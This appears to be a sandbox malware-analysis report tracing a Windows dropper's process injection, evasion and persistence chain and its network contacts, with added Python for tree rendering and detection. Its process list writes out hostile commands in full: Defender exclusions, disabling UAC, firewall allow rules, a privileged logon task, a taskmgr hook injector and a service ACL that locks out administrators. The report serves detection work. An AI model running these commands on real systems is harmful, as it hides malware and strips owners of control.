PID 2324 wrote to memory of 400 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\tehUCNoYrTKDGV6OXIKXpSpO.exe
PID 2324 wrote to memory of 4540 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe
PID 2324 wrote to memory of 4540 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe
PID 2324 wrote to memory of 4540 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe
PID 2324 wrote to memory of 4804 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe
PID 2324 wrote to memory of 4804 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe
PID 2324 wrote to memory of 4804 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe
PID 2324 wrote to memory of 4340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe
PID 2324 wrote to memory of 4340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe
PID 2324 wrote to memory of 4340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe
PID 2324 wrote to memory of 4132 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe
PID 2324 wrote to memory of 4132 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe
PID 2324 wrote to memory of 4132 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe
PID 400 wrote to memory of 4384 N/A C:\Users\Admin\Pictures\tehUCNoYrTKDGV6OXIKXpSpO.exe C:\Users\Admin\AppData\Local\Temp\ub4.0.exe
PID 400 wrote to memory of 4384 N/A C:\Users\Admin\Pictures\tehUCNoYrTKDGV6OXIKXpSpO.exe C:\Users\Admin\AppData\Local\Temp\ub4.0.exe
PID 400 wrote to memory of 4384 N/A C:\Users\Admin\Pictures\tehUCNoYrTKDGV6OXIKXpSpO.exe C:\Users\Admin\AppData\Local\Temp\ub4.0.exe
PID 4340 wrote to memory of 548 N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4340 wrote to memory of 548 N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4340 wrote to memory of 548 N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4540 wrote to memory of 372 N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4540 wrote to memory of 372 N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4540 wrote to memory of 372 N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 936 N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 936 N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 936 N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4132 wrote to memory of 3264 N/A C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4132 wrote to memory of 3264 N/A C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4132 wrote to memory of 3264 N/A C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3856 wrote to memory of 3876 N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3856 wrote to memory of 3876 N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3856 wrote to memory of 3876 N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1596 wrote to memory of 3376 N/A C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1596 wrote to memory of 3376 N/A C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1596 wrote to memory of 3376 N/A C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3636 wrote to memory of 4128 N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3636 wrote to memory of 4128 N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3636 wrote to memory of 4128 N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3764 wrote to memory of 3672 N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3764 wrote to memory of 3672 N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3764 wrote to memory of 3672 N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3856 wrote to memory of 5236 N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe C:\Windows\system32\cmd.exe
PID 3856 wrote to memory of 5236 N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe C:\Windows\system32\cmd.exe
PID 3764 wrote to memory of 5252 N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe C:\Windows\system32\cmd.exe
PID 3764 wrote to memory of 5252 N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe C:\Windows\system32\cmd.exe
PID 5236 wrote to memory of 5324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 5236 wrote to memory of 5324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 5252 wrote to memory of 5332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 5252 wrote to memory of 5332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3636 wrote to memory of 5368 N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe C:\Windows\system32\cmd.exe
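The rows above are emitted once per WriteProcessMemory call, so a single injection into regsvcs.exe shows up eight times and the overall chain is hard to read. The Python below is an added editorial example, not part of the sandbox output: it collapses a subset of the rows (copied verbatim from the table above into `ROWS`) into one edge per writer/target pair, keeps the call count on each edge, and prints the resulting tree. The row layout it parses is exactly the one shown above; the function names and the constants holding the image paths are the example's own. One thing the tree makes visible: in the full table, PIDs 3856, 1596, 3636 and 3764 appear only as writers and never as targets, so they land at the root here; where those instances came from has to be read from the process-creation data, not from this table.

```python
import ntpath  # Windows paths are parsed on any host, so use the NT flavour for basename
import re

# One row of the 'Suspicious use of WriteProcessMemory' table in this report.
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")


def parse_rows(text):
    """Collapse per-call rows into one edge per (writer, target) pair.

    Returns {(src_pid, dst_pid): {"src": image, "dst": image, "writes": n}} in
    first-seen order; 'writes' is the number of WriteProcessMemory rows seen.
    """
    edges = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # blank lines or anything that is not a table row
        src, dst, src_img, dst_img = int(m[1]), int(m[2]), m[3], m[4]
        e = edges.setdefault((src, dst), {"src": src_img, "dst": dst_img, "writes": 0})
        e["writes"] += 1
    return edges


def build_tree(edges):
    """Return (roots, children, image): roots are writers that nobody wrote into."""
    children, image = {}, {}
    for (src, dst), e in edges.items():
        children.setdefault(src, []).append(dst)
        image.setdefault(src, e["src"])
        image[dst] = e["dst"]
    targets = {dst for _, dst in edges}
    roots = [pid for pid in children if pid not in targets]
    return roots, children, image


def render(edges):
    """Indented text tree, basename only, with the write count on each edge."""
    roots, children, image = build_tree(edges)
    lines = []

    def walk(pid, depth, writes):
        tag = "" if writes is None else f" (writes={writes})"
        lines.append(f"{'  ' * depth}{pid} {ntpath.basename(image[pid])}{tag}")
        for child in children.get(pid, []):
            walk(child, depth + 1, edges[(pid, child)]["writes"])

    for root in roots:
        walk(root, 0, None)
    return lines


# Image paths exactly as they appear in the table above.
SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
TEH = r"C:\Users\Admin\Pictures\tehUCNoYrTKDGV6OXIKXpSpO.exe"
KID = r"C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe"
UB4 = r"C:\Users\Admin\AppData\Local\Temp\ub4.0.exe"
CMD = r"C:\Windows\system32\cmd.exe"
NETSH = r"C:\Windows\system32\netsh.exe"

# A subset of the report's rows (three of the eight 2208->2324 writes kept).
ROWS = "\n".join([
    f"PID 2208 wrote to memory of 956 N/A {SAMPLE} {PS64}",
    f"PID 2208 wrote to memory of 2324 N/A {SAMPLE} {REGSVCS}",
    f"PID 2208 wrote to memory of 2324 N/A {SAMPLE} {REGSVCS}",
    f"PID 2208 wrote to memory of 2324 N/A {SAMPLE} {REGSVCS}",
    f"PID 2324 wrote to memory of 400 N/A {REGSVCS} {TEH}",
    f"PID 2324 wrote to memory of 400 N/A {REGSVCS} {TEH}",
    f"PID 2324 wrote to memory of 400 N/A {REGSVCS} {TEH}",
    f"PID 400 wrote to memory of 4384 N/A {TEH} {UB4}",
    f"PID 2324 wrote to memory of 4540 N/A {REGSVCS} {KID}",
    f"PID 4540 wrote to memory of 372 N/A {KID} {PS32}",
    f"PID 3856 wrote to memory of 3876 N/A {KID} {PS32}",
    f"PID 3856 wrote to memory of 5236 N/A {KID} {CMD}",
    f"PID 5236 wrote to memory of 5324 N/A {CMD} {NETSH}",
])

if __name__ == "__main__":
    print("\n".join(render(parse_rows(ROWS))))
```

Feeding the complete table in produces the same picture at full size: the dropper writes into two regsvcs.exe instances, one of them writes into five executables under Pictures, and each of those in turn writes into a 32-bit powershell.exe. The elevated second-generation instances that spawn cmd.exe and netsh.exe have no recorded writer.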

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe

"C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

C:\Users\Admin\Pictures\tehUCNoYrTKDGV6OXIKXpSpO.exe

"C:\Users\Admin\Pictures\tehUCNoYrTKDGV6OXIKXpSpO.exe"

C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe

"C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe"

C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe

"C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe"

C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe

"C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe"

C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe

"C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe"

C:\Users\Admin\AppData\Local\Temp\ub4.0.exe

"C:\Users\Admin\AppData\Local\Temp\ub4.0.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe

"C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe"

C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe

"C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe"

C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe

"C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe"

C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe

"C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\ub4.1.exe

"C:\Users\Admin\AppData\Local\Temp\ub4.1.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4384 -ip 4384

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4384 -s 828
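The process list above carries the sample's whole defence-evasion and persistence sequence in plain command lines: a Defender path exclusion via Add-MpPreference, the EnableLUA = 0 write recorded under the System policy modification signature, an inbound firewall allow for C:\Windows\rss\csrss.exe, an ONLOGON scheduled task with /RL HIGHEST for the same binary, and an sc sdset that rewrites the WinDefender service DACL. That SDDL deserves decoding: the allow ACE for BUILTIN\Administrators (BA) omits WP and DT, and a separate deny ACE (D;;WPDT;;;BA) strips SERVICE_STOP and SERVICE_PAUSE_CONTINUE, so an administrator can no longer stop the service with sc stop or net stop, while WRITE_DAC (WD) and DELETE (SD) are left in the allow ACE, so an administrator can still reset the descriptor. The Python below is an added example and not part of the report or of any vendor's tooling: it decodes the service DACL and runs a handful of detections over constructed events modelled on the lines above. The event dictionaries, the rule names and the shortened sample.exe path are the example's own.

```python
import re

# Service-specific access rights as spelled in SDDL strings (Windows service
# security descriptor documentation). Used to decode 'sc sdset' arguments.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
# ACE layout: (type;flags;rights;object_guid;inherit_guid;trustee)
ACE_RE = re.compile(r"\((A|D|AU);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")


def parse_service_dacl(sddl):
    """Decode the DACL of a service SDDL into [(ace_type, [right names], trustee)]."""
    dacl = sddl.split("S:(")[0]  # drop the SACL; only access rights matter here
    aces = []
    for m in ACE_RE.finditer(dacl):
        ace_type, _flags, rights, _guid, _inherit, trustee = m.groups()
        names = [SERVICE_RIGHTS.get(rights[i:i + 2], rights[i:i + 2])
                 for i in range(0, len(rights), 2)]
        aces.append((ace_type, names, trustee))
    return aces


def stop_denied_to_admins(sddl):
    """True when a deny ACE takes SERVICE_STOP away from BUILTIN\\Administrators (BA)."""
    return any(t == "D" and who == "BA" and "SERVICE_STOP" in rights
               for t, rights, who in parse_service_dacl(sddl))


# Command-line patterns for the evasion and persistence steps seen in this report.
CMDLINE_RULES = [
    ("defender_exclusion_added",
     re.compile(r"Add-MpPreference\b.*-ExclusionPath", re.I)),
    ("firewall_allow_rule_added",
     re.compile(r"netsh\s+advfirewall\s+firewall\s+add\s+rule\b.*\baction=allow", re.I)),
    ("logon_task_highest_privileges",
     re.compile(r"schtasks\b.*/CREATE\b.*/SC\s+ONLOGON\b.*/RL\s+HIGHEST", re.I)),
]
SC_SDSET_RE = re.compile(r"\bsc(?:\.exe)?\s+sdset\s+(\S+)\s+(\S+)", re.I)
UAC_KEY = r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA"


def triage(events):
    """Run the rules over sandbox-style events; return a list of (rule, detail) hits."""
    hits = []
    for ev in events:
        if ev["type"] == "registry":
            # EnableLUA = 0 turns UAC off for every user after the next reboot.
            if ev["key"].upper().endswith(UAC_KEY.upper()) and str(ev["value"]) == "0":
                hits.append(("uac_disabled_enablelua_0", ev["process"]))
            continue
        cmd = ev["cmdline"]
        for name, rx in CMDLINE_RULES:
            if rx.search(cmd):
                hits.append((name, cmd))
        m = SC_SDSET_RE.search(cmd)
        if m and stop_denied_to_admins(m.group(2)):
            hits.append(("service_hardened_against_admin_stop", m.group(1)))
    return hits


# Constructed events mirroring the command lines and the registry write recorded
# in this report, plus the benign 'schtasks /delete' line, which must not fire.
SAMPLE_EVENTS = [
    {"type": "registry", "process": r"C:\Users\Admin\AppData\Local\Temp\sample.exe",
     "key": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",
     "value": 0},
    {"type": "process", "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
     r'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\sample.exe" -Force'},
    {"type": "process", "cmdline": 'netsh advfirewall firewall add rule name="csrss" dir=in '
     r'action=allow program="C:\Windows\rss\csrss.exe" enable=yes'},
    {"type": "process", "cmdline":
     r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F'},
    {"type": "process", "cmdline": "sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
     "(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)"
     "(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"},
    {"type": "process", "cmdline": "schtasks /delete /tn ScheduledUpdate /f"},
]

if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_EVENTS):
        print(f"{rule:40s} {detail}")
```

Each of these steps is also a legitimate administrative action on its own, so the value is in the combination and in the targets: an exclusion for a file in the user's Temp directory, a firewall rule and a HIGHEST-privilege logon task for a binary named after a system process but living under C:\Windows\rss, and a service DACL that denies administrators the right to stop it. The SDDL decoder is the part worth keeping around; sc sdset is rarely seen in normal change management, and a deny ACE against BA is worth paging on wherever it appears.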

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
BE 88.221.83.187:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
BE 88.221.83.187:443 www.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 187.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 onlycitylink.com udp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 nic-it.nl udp
US 8.8.8.8:53 realdeepai.org udp
RU 193.233.132.234:80 tcp
RU 193.233.132.175:80 tcp
RU 193.233.132.234:80 tcp
US 172.67.169.89:443 yip.su tcp
US 172.67.182.192:443 onlycitylink.com tcp
US 172.67.182.192:443 onlycitylink.com tcp
US 172.67.193.79:443 realdeepai.org tcp
US 172.67.193.79:443 realdeepai.org tcp
DE 138.201.79.103:80 nic-it.nl tcp
US 8.8.8.8:53 jonathantwo.com udp
US 8.8.8.8:53 firstfirecar.com udp
US 172.67.176.131:443 jonathantwo.com tcp
US 172.67.176.131:443 jonathantwo.com tcp
US 172.67.193.220:443 firstfirecar.com tcp
US 172.67.193.220:443 firstfirecar.com tcp
DE 185.172.128.90:80 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.150:80 tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 45.87.157.20.in-addr.arpa udp
DE 185.172.128.150:80 tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 download.iolo.net udp
FR 185.93.2.244:443 download.iolo.net tcp
US 8.8.8.8:53 244.2.93.185.in-addr.arpa udp
US 8.8.8.8:53 6c7c7b80-25b9-42e9-9f99-faa46e51d818.uuid.thestatsfiles.ru udp
US 20.157.87.45:80 svc.iolo.com tcp
DE 185.172.128.150:80 tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 145.155.9.20.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 stun1.l.google.com udp
US 8.8.8.8:53 server10.thestatsfiles.ru udp
US 8.8.8.8:53 cdn.discordapp.com udp
